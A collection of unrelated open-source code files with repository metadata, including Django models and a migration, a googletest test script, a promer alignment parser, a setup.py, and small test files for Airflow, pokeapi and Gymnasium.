txt = RunAndReturnOutput([
'--gtest_repeat=2',
])
expected_pattern = ('(.|\n)*'
r'Repeating all tests \(iteration 1\)'
'(.|\n)*'
'Global test environment set-up.'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
r'Repeating all tests \(iteration 2\)'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
'Global test environment tear-down'
'(.|\n)*')
self.assertRegex(txt, expected_pattern)
self.assertEqual(len(re.findall('Global test environment set-up', txt)), 1)
self.assertEqual(
len(re.findall('Global test environment tear-down', txt)), 1)
if __name__ == '__main__':
gtest_test_utils.Main()
|
{
"content_hash": "c77c9302b8e4179ca908f45cbc4e4ac3",
"timestamp": "",
"source": "github",
"line_count": 103,
"max_line_length": 80,
"avg_line_length": 36.09708737864078,
"alnum_prop": 0.5618612157073696,
"repo_name": "JasonRuonanWang/ADIOS2",
"id": "265793442f97758b28fb2732cced44575a185fd0",
"size": "5243",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "thirdparty/GTest/googletest/googletest/test/googletest-global-environment-unittest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "803179"
},
{
"name": "C++",
"bytes": "6277414"
},
{
"name": "CMake",
"bytes": "743595"
},
{
"name": "Cuda",
"bytes": "2207"
},
{
"name": "Dockerfile",
"bytes": "38819"
},
{
"name": "Fortran",
"bytes": "625959"
},
{
"name": "MATLAB",
"bytes": "26685"
},
{
"name": "Makefile",
"bytes": "8099"
},
{
"name": "PowerShell",
"bytes": "8948"
},
{
"name": "Python",
"bytes": "224252"
},
{
"name": "Roff",
"bytes": "1214"
},
{
"name": "Shell",
"bytes": "90517"
},
{
"name": "Tcl",
"bytes": "423"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
class TimeStampedModel(models.Model):
created_at = models.DateTimeField(_("Created at"), auto_now_add=True)
modified_at = models.DateTimeField(_("Modified at"), auto_now=True)
class Meta:
abstract = True
class AuthorTimeStampedModel(models.Model):
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Created by"),
null=True, blank=True, on_delete=models.SET_NULL, editable=False, related_name="+")
created_at = models.DateTimeField(_("Created at"), auto_now_add=True)
modified_at = models.DateTimeField(_("Modified at"), auto_now=True)
class Meta:
abstract = True
def get_or_none(qs, *args, **kwargs):
try:
return qs.get(*args, **kwargs)
except models.ObjectDoesNotExist:
return None
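# Usage sketch (Article is a hypothetical model):
#   article = get_or_none(Article.objects, pk=42)  # None instead of DoesNotExist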
|
{
"content_hash": "60f4a5d44fe0e39a0cf729e9e4373aca",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 107,
"avg_line_length": 30.90625,
"alnum_prop": 0.6663296258847321,
"repo_name": "nigma/djutil",
"id": "005bd96ca141c7e0e4bd4a4d87c878c12b95bb6a",
"size": "1013",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12523"
}
],
"symlink_target": ""
}
|
""" Defines a training options class as a holder for options that can be passed
for training a neural network.
"""
__author__ = "Mihaela Rosca"
__contact__ = "mihaela.c.rosca@gmail.com"
import numpy as np
# TODO: move from common here
import common
class TrainingOptions(object):
def __init__(self, miniBatchSize,
learningRate,
momentumMax=0.0,
rmsprop=False,
weightDecayL1=0.0,
weightDecayL2=0.0,
nesterovMomentum=False,
save_best_weights=False,
momentumForEpochFunction=common.getMomentumForEpochLinearIncrease,
momentumFactorForLearningRate=False):
self.miniBatchSize = miniBatchSize
self.learningRate = learningRate
self.momentumMax = np.float32(momentumMax)
self.rmsprop = rmsprop
self.weightDecayL1 = weightDecayL1
self.weightDecayL2 = weightDecayL2
self.nesterov = nesterovMomentum
self.momentumFactorForLearningRate = momentumFactorForLearningRate
self.momentumForEpochFunction = momentumForEpochFunction
self.batchLearningRate = np.float32(learningRate / miniBatchSize)
self.save_best_weights = save_best_weights
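# Usage sketch (the hyperparameter values are illustrative, not defaults):
#   options = TrainingOptions(miniBatchSize=10, learningRate=0.01,
#                             momentumMax=0.95, rmsprop=True)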
|
{
"content_hash": "e9d3f702861c136b2e18dd0469688574",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 79,
"avg_line_length": 33.64705882352941,
"alnum_prop": 0.7333916083916084,
"repo_name": "mihaelacr/pydeeplearn",
"id": "b8a1c090d4894baafb920a153b266b562688f753",
"size": "1144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/lib/trainingoptions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "OpenEdge ABL",
"bytes": "71237705"
},
{
"name": "PureBasic",
"bytes": "1324"
},
{
"name": "Python",
"bytes": "378279"
}
],
"symlink_target": ""
}
|
import logging
from django.core.management.base import BaseCommand, CommandError
import httplib2
from for_sale.models import ImageItemURLQueue
class Command(BaseCommand):
    args = ''
    help = 'Fetch images for all queued ImageItemURLQueue entries'
def handle(self, *args, **options):
for queued_image in ImageItemURLQueue.objects.all():
try:
queued_image.get_image()
except httplib2.HttpLib2Error:
logging.exception("Error fetching import image %d" % queued_image.id)
except:
logging.exception("Error fetching import images")
raise
|
{
"content_hash": "87062b15e6eb8fb5eceea8cd2cc111c9",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 85,
"avg_line_length": 27.24,
"alnum_prop": 0.6167400881057269,
"repo_name": "codepython/CollectorCity-Market-Place",
"id": "7157a8e065ee816947324b67ebf0a1eeb1297f7a",
"size": "681",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "stores/apps/for_sale/management/commands/cron_fetch_import_images.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "863646"
},
{
"name": "HTML",
"bytes": "475154"
},
{
"name": "JavaScript",
"bytes": "693720"
},
{
"name": "Python",
"bytes": "1860719"
},
{
"name": "Shell",
"bytes": "1174"
}
],
"symlink_target": ""
}
|
import re
def read_promer_coords(coords_file):
""" Parse promer coords file.
Keyword arguments:
coords_file -- Path to promer output coords file (string, required)
returns:
A list of dictionaries with the keys:
label -- An integer, in ascending order of when they are encountered.
psim -- % similarity of the alignment (based on the scoring matrix
that you used in promer).
pid -- % AA identity in the alignment.
pstp -- % stop codons in the alignment
reference -- A dictionary containing the seqid, start position,
end position, and strand of the alignment for the reference
sequence provided to promer.
query -- As with 'reference' but for the promer query sequence.
"""
start_finder = re.compile(r"=+")
line_split = re.compile(r"\s+\|\s+|\s+")
def strand_finder(string):
if int(string) < 0:
return '-'
else:
return '+'
links_promer = list()
    with open(coords_file) as coords:
        started = False
        for i, line in enumerate(coords):
            if i == 0:
                # The first line of a promer coords file lists the input files.
                genomes = line.split()
            line = line.strip()
            if not started:
                if start_finder.match(line) is not None:
                    started = True
            else:
                comp = dict()
                line = line_split.split(line)
                comp['label'] = i
                comp['pid'] = float(line[6])  # % identity
                comp['psim'] = float(line[7])  # % similarity
                comp['pstp'] = float(line[8])  # % stop codons
                comp['reference'] = {
                    "start": int(line[0]),
                    "end": int(line[1]),
                    "strand": strand_finder(line[9]),
                    "seqid": line[11]
                }
                comp['query'] = {
                    "start": int(line[2]),
                    "end": int(line[3]),
                    "strand": strand_finder(line[10]),
                    "seqid": line[12]
                }
                links_promer.append(comp)
    return links_promer
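
# A minimal usage sketch (the coords file name is hypothetical):
#
#     for aln in read_promer_coords('ref_vs_query.coords'):
#         print(aln['label'], aln['pid'],
#               aln['reference']['seqid'], aln['query']['seqid'])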
|
{
"content_hash": "05994d71f7d3d968642ac6478c0d5b88",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 77,
"avg_line_length": 35.32258064516129,
"alnum_prop": 0.4885844748858447,
"repo_name": "PlummerLab/2015-08-18-AvrRvi5_genomic_context",
"id": "b173293908c80e657acee6863ca6c4f52640a99a",
"size": "2190",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/read_promer_coords.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13570"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup
def read(*fname):
with open(os.path.join(os.path.dirname(__file__), *fname)) as f:
return f.read()
try:
    version = read('VERSION').strip()
except IOError:  # IOError also covers FileNotFoundError on Python 3
    version = '0'
setup(
name='putio.py',
description='Python client for put.io API v2',
version=version,
author=u'Cenk Altı',
author_email='cenkalti@gmail.com',
url='https://github.com/cenkalti/putio.py',
py_modules=['putiopy'],
include_package_data=True,
zip_safe=True,
platforms='any',
install_requires=['requests', 'tus.py', 'six'],
license='MIT',
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: MIT License',
],
)
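
# A sketch of the standard install paths for this package, assuming the
# usual setuptools/PyPI workflow (the distribution name is `putio.py`,
# as declared above):
#
#     pip install .          # from a source checkout
#     pip install putio.py   # from PyPI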
|
{
"content_hash": "9c1801610fe63290d6cdb35b81223447",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 68,
"avg_line_length": 24.88235294117647,
"alnum_prop": 0.6111111111111112,
"repo_name": "cenkalti/putio.py",
"id": "2e9e677d3255ee9ec9c7b9066b77ccacf4ac6408",
"size": "862",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23741"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('events', '0027_auto_20160819_1231'),
]
operations = [
migrations.AddField(
model_name='datasource',
name='api_key',
field=models.CharField(blank=True, max_length=128, null=True),
),
migrations.AddField(
model_name='datasource',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owned_system', to='events.Organization'),
),
migrations.AlterField(
model_name='event',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_event_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='keyword',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_keyword_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='keywordset',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_keywordset_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='organization',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_organization_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='place',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_place_data', to='events.DataSource'),
),
]
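
# A sketch of applying this migration with the standard Django workflow
# (`events` is the app label and `0028` the migration prefix from this file):
#
#     python manage.py migrate events 0028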
|
{
"content_hash": "18f049d397c39caab1585cbeaadfbb26",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 159,
"avg_line_length": 40.16326530612245,
"alnum_prop": 0.6204268292682927,
"repo_name": "aapris/linkedevents",
"id": "a1564610e325bc5d924785495d4e2f20a870e708",
"size": "2040",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "events/migrations/0028_add_api_keys_for_external_data_sources.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "4464"
},
{
"name": "Python",
"bytes": "415096"
},
{
"name": "Shell",
"bytes": "2177"
}
],
"symlink_target": ""
}
|
"""
This module contains various unit tests for
example_gcp_dlp DAG
"""
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_DLP_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, provide_gcp_context, skip_gcp_system
from tests.test_utils.system_tests_class import SystemTest
@skip_gcp_system(GCP_DLP_KEY, require_local_executor=True)
class GcpDLPExampleDagsSystemTest(SystemTest):
@provide_gcp_context(GCP_DLP_KEY)
def test_run_example_dag_function(self):
self.run_dag('example_gcp_dlp', CLOUD_DAG_FOLDER)
|
{
"content_hash": "e6d69048113645bc3b23637d38620b11",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 102,
"avg_line_length": 37.4,
"alnum_prop": 0.7754010695187166,
"repo_name": "spektom/incubator-airflow",
"id": "54d184103023defb42c275df0af5d97cce0f7275",
"size": "1373",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/providers/google/cloud/operators/test_dlp_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "17179"
},
{
"name": "HTML",
"bytes": "148492"
},
{
"name": "JavaScript",
"bytes": "25233"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "9768581"
},
{
"name": "Shell",
"bytes": "221415"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.test import TestCase
from pokemon_v2.models import *
class AbilityTestCase(TestCase):
    def setUp(self):
        Ability.objects.create(
            name="Smell",
            generation_id=3,
            is_main_series=True,
        )

    def test_fields_are_valid(self):
        smell = Ability.objects.get(name="Smell")
        self.assertEqual(smell.generation_id, 3)
|
{
"content_hash": "16b6354456d196ab0cea238461cb1a2c",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 45,
"avg_line_length": 24.375,
"alnum_prop": 0.6846153846153846,
"repo_name": "zaneadix/pokeapi",
"id": "c9b325b9b315b52f29fb746ce30b47a8229d6c88",
"size": "390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pokemon_v2/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "840"
},
{
"name": "HTML",
"bytes": "48499"
},
{
"name": "Makefile",
"bytes": "340"
},
{
"name": "Python",
"bytes": "740682"
}
],
"symlink_target": ""
}
|
import re
import pytest
import gymnasium as gym
from gymnasium.wrappers import HumanRendering
def test_human_rendering():
for mode in ["rgb_array", "rgb_array_list"]:
env = HumanRendering(
gym.make("CartPole-v1", render_mode=mode, disable_env_checker=True)
)
assert env.render_mode == "human"
env.reset()
for _ in range(75):
_, _, terminated, truncated, _ = env.step(env.action_space.sample())
if terminated or truncated:
env.reset()
env.close()
env = gym.make("CartPole-v1", render_mode="human")
with pytest.raises(
AssertionError,
match=re.escape(
"Expected env.render_mode to be one of 'rgb_array' or 'rgb_array_list' but got 'human'"
),
):
HumanRendering(env)
env.close()
|
{
"content_hash": "4c4a7d302030a3888c268fff77f487d1",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 99,
"avg_line_length": 26.46875,
"alnum_prop": 0.5844155844155844,
"repo_name": "Farama-Foundation/Gymnasium",
"id": "0583eae0bb51bc969e4255a0a0ffc08ba65ee890",
"size": "847",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/wrappers/test_human_rendering.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "888"
},
{
"name": "Python",
"bytes": "1188231"
},
{
"name": "Shell",
"bytes": "484"
}
],
"symlink_target": ""
}
|